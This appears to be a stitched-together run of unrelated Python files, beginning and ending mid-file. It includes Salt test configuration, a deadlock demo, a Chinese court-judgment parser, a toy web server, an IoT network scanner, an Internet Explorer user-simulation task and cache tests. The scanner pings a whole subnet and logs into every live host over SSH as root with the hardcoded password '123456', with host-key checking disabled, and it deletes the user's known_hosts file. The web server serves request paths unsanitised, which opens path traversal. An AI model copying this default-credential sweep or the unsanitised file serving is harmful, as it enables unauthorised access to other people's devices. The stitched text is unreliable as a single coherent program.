os.path.join(FILES, 'file', 'base'),
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
RUNTIME_VARS.TMP_STATE_TREE
],
# Alternate root to test __env__ choices
'prod': [
os.path.join(FILES, 'file', 'prod'),
RUNTIME_VARS.TMP_PRODENV_STATE_TREE
]
}
master_opts.setdefault('reactor', []).append(
{
'salt/minion/*/start': [
os.path.join(FILES, 'reactor-sync-minion.sls')
],
}
)
for opts_dict in (master_opts, sub_master_opts):
if 'ext_pillar' not in opts_dict:
opts_dict['ext_pillar'] = []
if salt.utils.platform.is_windows():
opts_dict['ext_pillar'].append(
{'cmd_yaml': 'type {0}'.format(os.path.join(FILES, 'ext.yaml'))})
else:
opts_dict['ext_pillar'].append(
{'cmd_yaml': 'cat {0}'.format(os.path.join(FILES, 'ext.yaml'))})
# all read, only owner write
autosign_file_permissions = stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH | stat.S_IWUSR
for opts_dict in (master_opts, sub_master_opts):
# We need to copy the extension modules into the new master root_dir or
# it will be prefixed by it
new_extension_modules_path = os.path.join(opts_dict['root_dir'], 'extension_modules')
if not os.path.exists(new_extension_modules_path):
shutil.copytree(
os.path.join(
INTEGRATION_TEST_DIR, 'files', 'extension_modules'
),
new_extension_modules_path
)
opts_dict['extension_modules'] = os.path.join(opts_dict['root_dir'], 'extension_modules')
# Copy the autosign_file to the new master root_dir
new_autosign_file_path = os.path.join(opts_dict['root_dir'], 'autosign_file')
shutil.copyfile(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'autosign_file'),
new_autosign_file_path
)
os.chmod(new_autosign_file_path, autosign_file_permissions)
# Point the config values to the correct temporary paths
for name in ('hosts', 'aliases'):
optname = '{0}.file'.format(name)
optname_path = os.path.join(TMP, name)
master_opts[optname] = optname_path
sub_master_opts[optname] = optname_path
minion_opts[optname] = optname_path
sub_minion_opts[optname] = optname_path
master_opts['runtests_conn_check_port'] = get_unused_localhost_port()
sub_master_opts['runtests_conn_check_port'] = get_unused_localhost_port()
minion_opts['runtests_conn_check_port'] = get_unused_localhost_port()
sub_minion_opts['runtests_conn_check_port'] = get_unused_localhost_port()
for conf in (master_opts, sub_master_opts, minion_opts, sub_minion_opts):
if 'engines' not in conf:
conf['engines'] = []
conf['engines'].append({'salt_runtests': {}})
if 'engines_dirs' not in conf:
conf['engines_dirs'] = []
conf['engines_dirs'].insert(0, ENGINES_DIR)
if 'log_handlers_dirs' not in conf:
conf['log_handlers_dirs'] = []
conf['log_handlers_dirs'].insert(0, LOG_HANDLERS_DIR)
conf['runtests_log_port'] = SALT_LOG_PORT
conf['runtests_log_level'] = os.environ.get('TESTS_MIN_LOG_LEVEL_NAME') or 'debug'
# ----- Transcribe Configuration ---------------------------------------------------------------------------->
computed_config = copy.deepcopy(master_opts)
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_MM_CONF_DIR, 'master'), 'w') as wfh:
salt.utils.yaml.safe_dump(copy.deepcopy(master_opts), wfh, default_flow_style=False)
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_MM_SUB_CONF_DIR, 'master'), 'w') as wfh:
salt.utils.yaml.safe_dump(copy.deepcopy(sub_master_opts), wfh, default_flow_style=False)
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_MM_CONF_DIR, 'minion'), 'w') as wfh:
salt.utils.yaml.safe_dump(copy.deepcopy(minion_opts), wfh, default_flow_style=False)
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_MM_SUB_CONF_DIR, 'minion'), 'w') as wfh:
salt.utils.yaml.safe_dump(copy.deepcopy(sub_minion_opts), wfh, default_flow_style=False)
# <---- Transcribe Configuration -----------------------------------------------------------------------------
# ----- Verify Environment ---------------------------------------------------------------------------------->
master_opts = salt.config.master_config(os.path.join(RUNTIME_VARS.TMP_MM_CONF_DIR, 'master'))
sub_master_opts = salt.config.master_config(os.path.join(RUNTIME_VARS.TMP_MM_SUB_CONF_DIR, 'master'))
minion_opts = salt.config.minion_config(os.path.join(RUNTIME_VARS.TMP_MM_CONF_DIR, 'minion'))
sub_minion_opts = salt.config.minion_config(os.path.join(RUNTIME_VARS.TMP_MM_SUB_CONF_DIR, 'minion'))
RUNTIME_VARS.RUNTIME_CONFIGS['mm_master'] = freeze(master_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['mm_sub_master'] = freeze(sub_master_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['mm_minion'] = freeze(minion_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['mm_sub_minion'] = freeze(sub_minion_opts)
verify_env([os.path.join(master_opts['pki_dir'], 'minions'),
os.path.join(master_opts['pki_dir'], 'minions_pre'),
os.path.join(master_opts['pki_dir'], 'minions_rejected'),
os.path.join(master_opts['pki_dir'], 'minions_denied'),
os.path.join(master_opts['cachedir'], 'jobs'),
os.path.join(master_opts['cachedir'], 'raet'),
os.path.join(master_opts['root_dir'], 'cache', 'tokens'),
os.path.join(master_opts['pki_dir'], 'accepted'),
os.path.join(master_opts['pki_dir'], 'rejected'),
os.path.join(master_opts['pki_dir'], 'pending'),
os.path.join(master_opts['cachedir'], 'raet'),
os.path.join(sub_master_opts['pki_dir'], 'minions'),
os.path.join(sub_master_opts['pki_dir'], 'minions_pre'),
os.path.join(sub_master_opts['pki_dir'], 'minions_rejected'),
os.path.join(sub_master_opts['pki_dir'], 'minions_denied'),
os.path.join(sub_master_opts['cachedir'], 'jobs'),
os.path.join(sub_master_opts['cachedir'], 'raet'),
os.path.join(sub_master_opts['root_dir'], 'cache', 'tokens'),
os.path.join(sub_master_opts['pki_dir'], 'accepted'),
os.path.join(sub_master_opts['pki_dir'], 'rejected'),
os.path.join(sub_master_opts['pki_dir'], 'pending'),
os.path.join(sub_master_opts['cachedir'], 'raet'),
os.path.join(minion_opts['pki_dir'], 'accepted'),
os.path.join(minion_opts['pki_dir'], 'rejected'),
os.path.join(minion_opts['pki_dir'], 'pending'),
os.path.join(minion_opts['cachedir'], 'raet'),
os.path.join(sub_minion_opts['pki_dir'], 'accepted'),
os.path.join(sub_minion_opts['pki_dir'], 'rejected'),
os.path.join(sub_minion_opts['pki_dir'], 'pending'),
os.path.join(sub_minion_opts['cachedir'], 'raet'),
os.path.dirname(master_opts['log_file']),
minion_opts['extension_modules'],
sub_minion_opts['extension_modules'],
sub_minion_opts['pki_dir'],
master_opts['sock_dir'],
sub_master_opts['sock_dir'],
sub_minion_opts['sock_dir'],
minion_opts['sock_dir'],
],
RUNTIME_VARS.RUNNING_TESTS_USER,
root_dir=master_opts['root_dir'],
)
cls.mm_master_opts = master_opts
cls.mm_sub_master_opts = sub_master_opts
cls.mm_minion_opts = minion_opts
cls.mm_sub_minion_opts = sub_minion_opts
# <---- Verify Environment -----------------------------------------------------------------------------------
@classmethod
def config_location(cls):
return (RUNTIME_VARS.TMP_MM_CONF_DIR, RUNTIME_VARS.TMP_MM_SUB_CONF_DIR)
|
thread_deadlock.py
|
""" thread deadlock demo """
import threading
import time
counter1_lock = threading.Lock()
counter2_lock = threading.Lock()
counter1 = 2
counter2 = 4
def task_one() -> None:
""" task one """
global counter1
global counter2
with counter1_lock:
time.sleep(1)
with counter2_lock:
x = counter1
y = counter2
x = x - 1
y = y - 1
counter1 = x
counter2 = y
def task_two() -> None:
""" task one """
global counter1
global counter2
with counter1_lock:
time.sleep(1)
with counter2_lock:
x = counter1
y = counter2
x = x - 1
y = y - 1
counter1 = x
counter2 = y
print(f"start counter 1: {counter1}")
print(f"start counter 2: {counter2}")
thread1 = threading.Thread(target=task_one)
thread1.start()
thread2 = threading.Thread(target=task_two)
thread2.start()
thread1.join()
thread2.join()
print(f"end counter 1: {counter1}")
print(f"end counter 2: {counter2}")
|
draw_out.py
|
# coding: UTF-8
import os
import json
import re
# in_path = r"D:\work\law_pre\test\in"
# out_path = r"D:\work\law_pre\test\out"
in_path = r"/disk/mysql/law_data/formed_data"
out_path = r"/disk/mysql/law_data/critical_data"
mid_text = u" _(:з」∠)_ "
title_list = ["docId", "caseNumber", "caseName", "spcx", "court", "time", "caseType", "bgkly", "yuanwen", "document",
"cause", "docType", "keyword", "lawyer", "punishment", "result", "judge"]
accusation_file = r"/home/zhx/law_pre/data_processor/accusation_list2.txt"
accusation_f = open(accusation_file, "r", encoding='utf8')
accusation_list = json.loads(accusation_f.readline())
# accusation_list = []
# for line in accusation_f:
# accusation_list.append(line[:-1])
num_file = 20
num_process = 4
num_list = {
u"〇": 0,
u"\uff2f": 0,
u"\u3007": 0,
u"\u25cb": 0,
u"\uff10": 0,
u"\u039f": 0,
u'零': 0,
"O": 0,
"0": 0,
u"一": 1,
u"元": 1,
u"1": 1,
u"二": 2,
u"2": 2,
u"两": 2,
u'三': 3,
u'3': 3,
u'四': 4,
u'4': 4,
u'五': 5,
u'5': 5,
u'六': 6,
u'6': 6,
u'七': 7,
u'7': 7,
u'八': 8,
u'8': 8,
u'九': 9,
u'9': 9,
u'十': 10,
u'百': 100,
u'千': 1000,
u'万': 10000
}
num_str = ""
for x in num_list:
num_str = num_str + x
def parse_date_with_year_and_month_begin_from(s, begin, delta):
# erf = open("error.log", "a")
pos = begin + delta
num1 = 0
while s[pos] in num_list:
if s[pos] == u"十":
if num1 == 0:
num1 = 1
num1 *= 10
elif s[pos] == u"百" or s[pos] == u"千" or s[pos] == u"万":
# print("0 " + s[begin - 10:pos + 20], file=erf)
return None
else:
num1 = num1 + num_list[s[pos]]
pos += 1
num = 0
if s[pos] == u"年":
num2 = 0
pos += 1
if s[pos] == u"又":
pos += 1
while s[pos] in num_list:
if s[pos] == u"十":
if num2 == 0:
num2 = 1
num2 *= 10
elif s[pos] == u"百" or s[pos] == u"千" or s[pos] == u"万":
# print("1 " + s[begin - 10:pos + 20], file=erf)
return None
else:
num2 = num2 + num_list[s[pos]]
pos += 1
if s[pos] == u"个":
pos += 1
if num2 != 0 and s[pos] != u"月":
# print("2 " + s[begin - 10:pos + 20], file=erf)
return None
num = num1 * 12 + num2
else:
if s[pos] == u"个":
pos += 1
if s[pos] != u"月":
# print("3 " + s[begin - 10:pos + 20], file=erf)
return None
else:
num = num1
pos += 1
# print(num,s[x.start():pos])
return num
def parse_term_of_imprisonment(data):
result = {}
if "PJJG" in data["document"]:
s = data["document"]["PJJG"].replace('b', '')
# 有期徒刑
youqi_arr = []
pattern = re.compile(u"有期徒刑")
for x in pattern.finditer(s):
pos = x.start()
data = parse_date_with_year_and_month_begin_from(s, pos, len(u"有期徒刑"))
if not (data is None):
youqi_arr.append(data)
# 拘役
juyi_arr = []
pattern = re.compile(u"拘役")
for x in pattern.finditer(s):
pos = x.start()
data = parse_date_with_year_and_month_begin_from(s, pos, len(u"拘役"))
if not (data is None):
juyi_arr.append(data)
# 管制
guanzhi_arr = []
pattern = re.compile(u"管制")
for x in pattern.finditer(s):
pos = x.start()
data = parse_date_with_year_and_month_begin_from(s, pos, len(u"管制"))
if not (data is None):
guanzhi_arr.append(data)
# 无期
forever = False
if s.count("无期徒刑") != 0:
forever = True
# 死刑
dead = False
if s.count("死刑") != 0:
dead = True
result["youqi"] = youqi_arr
result["juyi"] = juyi_arr
result["guanzhi"] = guanzhi_arr
result["wuqi"] = forever
result["sixing"] = dead
return result
def dfs_search(s, x, p, y):
if p >= len(x):
return s.count(y) != 0
if x[p] == "[":
pp = p
while x[pp] != "]":
pp += 1
subs = x[p + 1:pp].split(u"、")
for z in subs:
if dfs_search(s, x, pp + 1, y + z):
return True
if dfs_search(s, x, pp + 1, y + x[p + 1:pp]):
return True
else:
return False
else:
return dfs_search(s, x, p + 1, y + x[p])
def check(x, s):
return dfs_search(s, x, 0, "")
def parse_name_of_accusation(data):
if "PJJG" in data["document"]:
s = data["document"]["PJJG"]
result = []
for x in accusation_list:
if check(x, s):
result.append(x.replace("[", "").replace("]", ""))
# print(result)
# if len(result) == 0:
# print(s)
return result
else:
return []
key_word_list = [u"第", u"条", u"款", u"、", u",", u"(", u")", u"之"]
def get_number_from_string(s):
for x in s:
if not (x in num_list):
print(s)
gg
value = 0
try:
value = int(s)
except ValueError:
nowbase = 1
addnew = True
for a in range(len(s) - 1, -1, -1):
if s[a] == u'十':
if nowbase >= 10000:
nowbase = 100000
else:
nowbase = 10
addnew = False
elif s[a] == u'百':
if nowbase >= 10000:
nowbase = 1000000
else:
nowbase = 100
addnew = False
elif s[a] == u'千':
if nowbase >= 10000:
nowbase = 10000000
else:
nowbase = 1000
addnew = False
elif s[a] == u'万':
nowbase = 10000
addnew = False
else:
value = value + nowbase * num_list[s[a]]
nowbase = nowbase * 10
addnew = True
if not (addnew):
value += nowbase
return value
def get_one_reason(content, rex):
pos = rex.start()
law_name = rex.group(1)
nows = rex.group().replace(u"(", u"").replace(u")", u"")
# print(nows)
result = []
p = 0
while nows[p] != u"》":
p += 1
while nows[p] != u"第":
p += 1
tiao_num = 0
kuan_num = 0
add_kuan = True
zhiyi = 0
while p < len(nows):
nowp = p + 1
while not (nows[nowp] in key_word_list):
nowp += 1
num = get_number_from_string(nows[p + 1:nowp])
if nows[nowp] != u"款":
if not (add_kuan):
result.append({"law_name": law_name, "tiao_num": tiao_num, "kuan_num": 0, "zhiyi": zhiyi})
tiao_num = num
add_kuan = False
if len(nows) > nowp + 2 and nows[nowp + 1] == u"之" and nows[nowp + 2] in num_list:
if num_list[nows[nowp + 2]] != 1:
print(nows)
# gg
zhiyi = num_list[nows[nowp + 2]]
else:
zhiyi = 0
else:
kuan_num = num
result.append({"law_name": law_name, "tiao_num": tiao_num, "kuan_num": kuan_num, "zhiyi": zhiyi})
add_kuan = True
p = nowp
while p < len(nows) and nows[p] != u'第':
p += 1
if not (add_kuan):
result.append({"law_name": law_name, "tiao_num": tiao_num, "kuan_num": 0, "zhiyi": zhiyi})
# print(result)
# if zhiyi == 1:
# gg
# print nows
# for x in result:
# print x["law_name"], x["tiao_num"], x["kuan_num"]
# print
return result
def sort_reason(l):
result_list = []
law_list = {}
for x in l:
z = x
if not (z["law_name"] in law_list):
law_list[z["law_name"]] = set()
law_list[z["law_name"]].add((z["tiao_num"], z["kuan_num"], z["zhiyi"]))
for x in law_list:
gg = []
for (y, z, r) in law_list[x]:
gg.append((y, z, r))
gg = list(set(gg))
gg.sort()
for (y, z, r) in gg:
result_list.append({"law_name": x, "tiao_num": y, "kuan_num": z, "zhiyi": r})
return result_list
def parse_name_of_law(data):
if not ("content" in data["document"]):
return []
key_word_str = num_str
for x in key_word_list:
key_word_str = key_word_str + x
rex = re.compile(u"《(中华人民共和国刑法)》第[" + key_word_str + u"]*[条款]")
result = rex.finditer(data["document"]["content"])
result_list = []
law_list = {}
for x in result:
y = get_one_reason(data["document"]["content"], x)
for z in y:
if not (z["law_name"] in law_list):
law_list[z["law_name"]] = set()
law_list[z["law_name"]].add((z["tiao_num"], z["kuan_num"], z["zhiyi"]))
for x in law_list:
for (y, z, r) in law_list[x]:
result_list.append({"law_name": x, "tiao_num": y, "kuan_num": z, "zhiyi": r})
return sort_reason(result_list)
def parse_money(data):
if not ("PJJG" in data["document"]):
return []
result_list = []
rex = re.compile(u"人民币([" + num_str + "]*)元")
result = rex.finditer(data["document"]["PJJG"])
for x in result:
datax = get_number_from_string(x.group(1))
result_list.append(datax)
# print(x.group(1), datax)
# print(result_list)
return result_list
def parse(data):
result = {}
# print(data["document"]["PJJG"])
result["term_of_imprisonment"] = parse_term_of_imprisonment(data)
result["name_of_accusation"] = parse_name_of_accusation(data)
result["name_of_law"] = parse_name_of_law(data)
result["punish_of_money"] = parse_money(data)
return result
def draw_out(in_path, out_path):
print(in_path)
inf = open(in_path, "r")
ouf = open(out_path, "w")
cnt = 0
for line in inf:
try:
data = json.loads(line)
if data["caseType"] == "1" and data["document"] != {} and "Title" in data["document"] and not (
re.search(u"判决书", data["document"]["Title"]) is None):
data["meta_info"] = parse(data)
print(json.dumps(data), file=ouf)
cnt += 1
if cnt % 500000 == 0:
print(in_path, cnt)
# break
except Exception as e:
print(e)
# gg
def work(from_id, to_id):
for a in range(int(from_id), int(to_id)):
print(str(a) + " begin to work")
draw_out(os.path.join(in_path, str(a)), os.path.join(out_path, str(a)))
print(str(a) + " work done")
if __name__ == "__main__":
import multiprocessing
process_pool = []
for a in range(0, num_process):
process_pool.append(
multiprocessing.Process(target=work, args=(a * num_file / num_process, (a + 1) * num_file / num_process)))
for a in process_pool:
a.start()
for a in process_pool:
a.join()
|
web_server_1.py
|
#!/usr/bin/python3
# file: multiprocess_web_server.py
# Created by Guang at 19-7-19
# description:
# *-* coding:utf8 *-*
import multiprocessing
import socket
import re
import time
import sys
sys.path.insert(0, "../../")
from mini_web.framework import mini_frame_1
class WSGIServer(object):
def __init__(self, ip, port):
# 1.创建套接字
self.listen_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.listen_server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# 2.绑定ip和port
self.local_addr = (ip, port)
self.listen_server.bind(self.local_addr)
# 3.主动变被动
self.listen_server.listen(128)
def service_client(self, new_socket):
"""为这个客户端返回数据"""
# 1.接收浏览器发送过来的请求, 即HTTP请求
# GET / HTTP/1.1
request = new_socket.recv(1024).decode('utf-8')
# print("-" * 100)
# print(request)
request_lines = request.splitlines() # 当客户端主动关闭, 会收到空字符串并解阻塞; 这里会生成空列表
if not request_lines:
return
# print(request_lines)
# GET /index.html HTTP/1.1
# GET POST DELETE
file_name = ""
ret = re.match(r'[^/]+(/[^ ]*)', request_lines[0])
if ret:
file_name = ret.group(1)
# print("*" * 50, file_name)
if file_name == "/":
file_name = "/index.html"
# 2.返回HTTP格式的数据
# 2.1 静态资源和动态资源, 假设以 xxx.py 结尾的是动态资源
if not file_name.endswith(".py"):
try:
f = open("./html" + file_name, 'rb')
except Exception as e:
response = "HTTP/1.1 404 NOT FOUND\r\n"
response += "\r\n"
response += "----------file not found --------"
new_socket.send(response.encode("utf-8"))
else:
html_content = f.read()
f.close()
# 2.1 准备发送给浏览器的数据 -- header
response = "HTTP/1.1 200 OK\r\n"
response += "\r\n"
# 2.2 准备发送给浏览器的数据 -- body
# response += “哈哈哈哈”
# 将response header 发送给浏览器
new_socket.send(response.encode("utf-8"))
# 将response body 发送给服务器
new_socket.send(html_content)
else:
# 2.2 请求动态资源
header = "HTTP/1.1 200 OK\r\n"
header += "\r\n"
body = ""
# body = "This is a dynamic source web_app \r\n %s" % time.ctime()
if file_name == "/login.py":
body = mini_frame_1.login()
elif file_name == "/register.py":
body = mini_frame_1.register()
response = header + body
new_socket.send(response.encode("utf-8"))
# 这里必须再关闭一次, 底层文件描述符
new_socket.close()
def runserver(self):
"""主函数: 整体控制"""
while True:
# 4.等待新客户端的连接
new_socket, client_addr = self.listen_server.accept()
# 5.为这个客户端服务
p = multiprocessing.Process(target=self.service_client, args=(new_socket, ))
p.start()
# 进程类实现的并发服务器,必须要在这里也new_socket.close一次; 原因:文件描述符 fd
new_socket.close()
# 关闭监听套接字
self.listen_server.close()
if __name__ == '__main__':
ip = ''
port = 8888
wsgi_server = WSGIServer(ip, port)
wsgi_server.runserver()
|
main.py
|
#! /usr/bin/env python
import subprocess
# try to import this libraries of install it
try:
import ipaddress
except:
print "install ipaddress"
subprocess.call("pip install ipaddress", shell=True)
import ipaddress
try:
import pexpect
except:
print "install pexpect"
subprocess.call("pip install pexpect", shell=True)
import pexpect
import datetime
import os
import threading
import time
import socket
import message
from iot_device import iot_device
import re
import auxiliary_functions
from message import update_queue
from message import Message
import listen
from constant_variable import *
########################### GLOBAL VALUES #####################
devices = [] #IOT devices
threads = [] #ip threads to ping and check
pos_ips = [] # possible ips to check if they are iot devices
# remove all known hosts and copy backup at known_hosts-old
try:
subprocess.call("cp -av ~/.ssh/known_hosts ~/.ssh/known_hosts-old", shell=False)
subprocess.call("rm ~/.ssh/known_hosts", shell=False)
except:
pass
# Prompt the user to input a network address
net_addr =auxiliary_functions.get_range()
# u'192.168.43.0/24'
# Create the network
ip_net = ipaddress.ip_network(net_addr)
# Get all hosts on that network
all_hosts = list(ip_net.hosts())
# Configure subprocess to hide the console window
info = None
if os.name == 'nt':
info = subprocess.STARTUPINFO()
# use ssh command to remote device to return the device name
def ssh(host, cmd, user, password, timeout=10, bg_run=False):
result = None
try:
options = '-q -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null -oPubkeyAuthentication=no'
if bg_run:
options += ' -f'
ssh_cmd = 'ssh %s@%s %s "%s"' % (user, host, options, cmd)
ssh_newkey = 'Do you want to continue connecting?'
p = pexpect.spawn(ssh_cmd, timeout=timeout)
i = p.expect([ssh_newkey, 'password:', pexpect.EOF])
if i == 0:
p.sendline('y')
i = p.expect([ssh_newkey, 'password:', pexpect.EOF])
if i == 1:
p.sendline(password)
p.expect(pexpect.EOF)
result = p.before
elif i == 2:
result = 'Unknown'
except:
result = 'Unknown'
return result
# ping function to run on any host in the LAN
def ping_host(i):
output = subprocess.Popen(['ping', '-c', '1', '-w', '1', str(all_hosts[i])], stdout=subprocess.PIPE,
startupinfo=info).communicate()[0]
if " 0 packets received, 100% packet loss" in output.decode('utf-8'):
return
elif "Request timed out" in output.decode('utf-8'):
return
else:
ip = str(all_hosts[i])
my_ips = str(auxiliary_functions.my_ip_address())
if my_ips != ip:
pos_ips.append(ip)
return
# start ssh function and append to iot-devices list if the ip is of iot devices
def ssh_start(ip):
name = ssh(ip,'uname -n','root','123456')
if name != 'Unknown':
name = re.sub("[^a-zA-Z0-9]", '',name)
devices.append(iot_device(name, ip, False))
return
# print scanning and dots every 2 iterations
def progress(count):
if count == 0:
print "Scanning"
elif count % 2 ==0:
print "..."
return count +1
# scan for devices in the LAN - run on 255 ips
def scan():
global threads
global devices
global pos_ips
pos_ips = []
devices = []
count = 0
# run 255 threads to ping and check who is active
for i in range(0, 11):
count=progress(count)
s = v = 25
if i == 0:
f = 1
else:
f = i*s
if i == 10:
v = 4
for j in range(f, (i * s) + v):
t = threading.Thread(target=ping_host,args=(j,))
threads.append(t)
t.start()
for t in threads:
t.join(10)
threads = []
# run threads on the active ip's in the LAN to get NAME
for i in range(len(pos_ips)):
t = threading.Thread(target=ssh_start,args=(pos_ips[i],))
threads.append(t)
t.start()
for t in threads:
t.join(10)
threads = []
# append my device and sort by ip
devices.append(iot_device(socket.gethostname(), auxiliary_functions.my_ip_address(), False))
devices = sorted(devices, key=lambda iot_device: int(iot_device.ip.split('.')[3]))
find_master = False
if devices[0].ip != auxiliary_functions.my_ip_address():
for device in devices:
if device.ip != auxiliary_functions.my_ip_address():
message = Message(device,None, CHECKS_THAT_MASTER_IS_ALIVE, MESSAGE_TO_MASTER_IS_ALIVE)
res = auxiliary_functions.send_message(message)
if res != None:
device.master = True
find_master = True
master = devices.pop(devices.index(device))
message = Message(device,None,YOU_ARE_THE_MASTER,"You are the master")
auxiliary_functions.send_message(message)
break
if not find_master:
for device in devices:
if device.ip == auxiliary_functions.my_ip_address():
master = devices.pop(devices.index(device))
device.master = True
print "I am the master ,%s is not active" % (devices[0].name)
devices = [master] + sorted(devices, key=lambda iot_device: int(iot_device.ip.split('.')[3]))
else:
devices[0].master = True
# update the master in queue
update_queue(devices[0])
print "==============="
for device in devices:
print device
print "==============="
if devices[0].ip == auxiliary_functions.my_ip_address():
for device in devices[1:]:
message = Message(device,None,GET_FROM_MASTER,devices[0].ip+'|'+devices[0].name)
auxiliary_functions.send_message(message)
# message.add_to_queue()
open("master alive", 'w').write("T")
pid = os.fork()
if pid is 0:
auxiliary_functions.send_messages(devices)
devices = scan()
listen.start_sense(devices)
os._exit(0)
return devices
# check if this devices is the master in our network
def i_am__the_master():
if auxiliary_functions.my_ip_address() == devices[0].ip:
return True
return False
# ======= MAIN ========
if __name__ == '__main__':
if not auxiliary_functions.file_exist(MESSAGE_QUEUE_FILE):
open(MESSAGE_QUEUE_FILE,"w")
scan()
pid = os.fork()
if pid is 0:
listen.start_sense(devices)
os._exit(0)
else:
listen.listen(devices, pid)
|
iebrowser.py
|
# Copyright 2017 Carnegie Mellon University. See LICENSE.md file for terms.
# Ali Kidwai
# July 26, 2017
# Adapted from code written by Rotem Guttman and Joe Vessella
import functools
import platform
import queue
import random
import threading
import time
import traceback
import psutil
try:
import pythoncom
import win32api
import win32com.client
import win32con
import win32process
except ImportError:
# Tasks must be importable on any platform.
pass
import api
from tasks import browser
class IEManager(object):
""" Allows different InternetExplorer tasks to share one instance of Internet Explorer. Spawns a new consumer thread
to visit sites so that UserSim doesn't block while waiting for sites to load.
"""
_action_queue = None
_ie = None
_persist = True
def __new__(cls):
""" Initialize the action queue and spawn a consumer thread if the IEManager hasn't already been created.
"""
if cls._action_queue is None:
cls._action_queue = queue.Queue()
t = threading.Thread(target=cls._action_executor)
t.daemon = True
t.start()
cls._action_queue.put((cls._start_ie, 0, 10))
return cls
@classmethod
def _action_executor(cls):
""" Target function for the consumer thread. Executes actions from the action queue. If the main User Sim thread
calls IEManager.close_browser(), then the consumer thread will finish any actions remaining on the queue, close
the browser window, and reset the class variables.
"""
while cls._persist or not cls._action_queue.empty():
try:
# Without the timeout, this would block forever if cls._persist is set to False after the get call
# already started.
action, task_id, delay = cls._action_queue.get(timeout=1)
except queue.Empty:
continue
else:
try:
action()
except Exception:
api.add_feedback(task_id, traceback.format_exc())
time.sleep(delay)
cls._action_queue = None
cls._persist = True
try:
cls._ie.Quit()
except Exception:
# Try to kill it. If not, oh well.
try:
for process in psutil.process_iter():
if 'iexplore' in process.name():
process.kill()
except Exception:
pass
finally:
cls._ie = None
@classmethod
def get(cls, site, task_id, delay=0):
""" Add a _visit_site action to the action queue.
"""
# Use functools.partial so that the action doesn't need any arguments
cls._action_queue.put((functools.partial(cls._visit_site, site), task_id, delay))
@classmethod
def status(cls):
if not cls._ie:
return 'IE has not yet been fully started.'
if cls._ie.Busy:
return 'IE reports that it is loading a web page.'
else:
return 'IE is idle.'
@classmethod
def close_browser(cls):
""" Sets _persist to False so that the consumer thread breaks out of its loop.
"""
cls._persist = False
@classmethod
def _start_ie(cls):
""" Create an instance of Internet Explorer.
"""
pythoncom.CoInitialize()
cls._ie = win32com.client.gencache.EnsureDispatch('InternetExplorer.Application')
cls._ie.Visible = True
@classmethod
def _visit_site(cls, site):
""" Navigate to site and wait for Internet Explorer to either time out or finish loading.
"""
cls._ie.Navigate(site)
cls._wait_for_ie()
@classmethod
def _wait_for_ie(cls):
""" Wait for Internet Explorer to either time out or finish loading. If it times out, try to terminate it.
"""
start = time.time()
while cls._ie.Busy or cls._ie.Document.readyState != 'complete':
if time.time() - start >= 200: # IE timed out; terminate it.
_, pid = win32process.GetWindowThreadProcessId(cls._ie.HWND)
handle = win32api.OpenProcess(win32con.PROCESS_TERMINATE, 0, pid)
if handle:
win32api.TerminateProcess(handle, 0)
win32api.CloseHandle(handle)
class IEBrowser(browser.Browser):
""" Opens an instance of Internet Explorer and visits a website at random from the configuration. Windows-only.
"""
def __init__(self, config):
if not platform.system() == 'Windows':
raise OSError('This task is only compatible with Windows.')
super().__init__(config)
self._close = config['close_browser']
self._driver = IEManager()
def __call__(self):
super().__call__()
if self._close:
self._driver.close_browser()
@classmethod
def parameters(cls):
""" Returns a dictionary with the required and optional parameters of the class, with human-readable
descriptions for each.
Returns:
dict of dicts: A dictionary whose keys are 'required' and 'optional', and whose values are dictionaries
containing the required and optional parameters of the class as keys and human-readable (str)
descriptions and requirements for each key as values.
"""
params = super().parameters()
params['optional']['close_browser'] = 'bool| If True, the browser window will close after visiting a website. '\
'Defaults to False.'
return params
@classmethod
def validate(cls, config):
""" Validates the given configuration dictionary. Makes sure that each site in config['sites'] is a string, but
doesn't actually check to see if they are valid web addresses.
Args:
config (dict): The dictionary to validate. Its keys and values are subclass-specific.
Raises:
KeyError: If a required configuration option is missing. The error message is the missing key.
ValueError: If a configuration option's value is not valid. The error message is in the following format:
key: value requirement
Returns:
dict: The dict given as the config argument with missing optional parameters added with default values.
"""
extra_defaults = {'close_browser': False}
return super().validate(config, extra_defaults=extra_defaults)
|
test_cache.py
|
# -*- coding: utf-8 -*-
import cachetools
import pytest
import six
import threading
import large_image.cache_util.cache
from large_image import config
from large_image.cache_util import cached, strhash, Cache, MemCache, \
methodcache, LruCacheMetaclass, cachesInfo, cachesClear, getTileCache
class Fib(object):
def num(self, k):
if k > 2:
return self.num(k - 1) + self.num(k - 2)
else:
return 1
def cache_test(specific_cache, maxNum=100):
temp = Fib()
temp.num = cached(cache=specific_cache, key=strhash)(temp.num)
temp.num(maxNum)
if maxNum >= 3:
assert temp.num(3) == 2
if maxNum >= 100:
assert temp.num(100) == 354224848179261915075
def testLRUCacheTools():
cache_test(Cache(1000))
def testCacheMemcached():
cache_test(MemCache())
def testCheckCacheMemcached():
cache = MemCache()
cache_test(cache)
val = cache['(2,)']
assert val == 1
val = cache['(100,)']
assert val == 354224848179261915075
def testBadMemcachedUrl():
# go though and check if all 100 fib numbers are in cache
# it is stored in cache as ('fib', #)
cache = MemCache(url=['192.0.2.254', '192.0.2.253'])
cache_test(cache, 3)
with pytest.raises(KeyError):
cache['(2,)']
def testGetTileCachePython():
large_image.cache_util.cache._tileCache = None
large_image.cache_util.cache._tileLock = None
config.setConfig('cache_backend', 'python')
tileCache, tileLock = getTileCache()
assert isinstance(tileCache, cachetools.LRUCache)
def testGetTileCacheMemcached():
large_image.cache_util.cache._tileCache = None
large_image.cache_util.cache._tileLock = None
config.setConfig('cache_backend', 'memcached')
tileCache, tileLock = getTileCache()
assert isinstance(tileCache, MemCache)
class TestClass(object):
def testLRUThreadSafety(self):
# The cachetools LRU cache is not thread safe, and if two threads ask
# to evict an old value concurrently, the cache will raise a KeyError
# and then be in a broken state. Test that we fall-back garcefully in
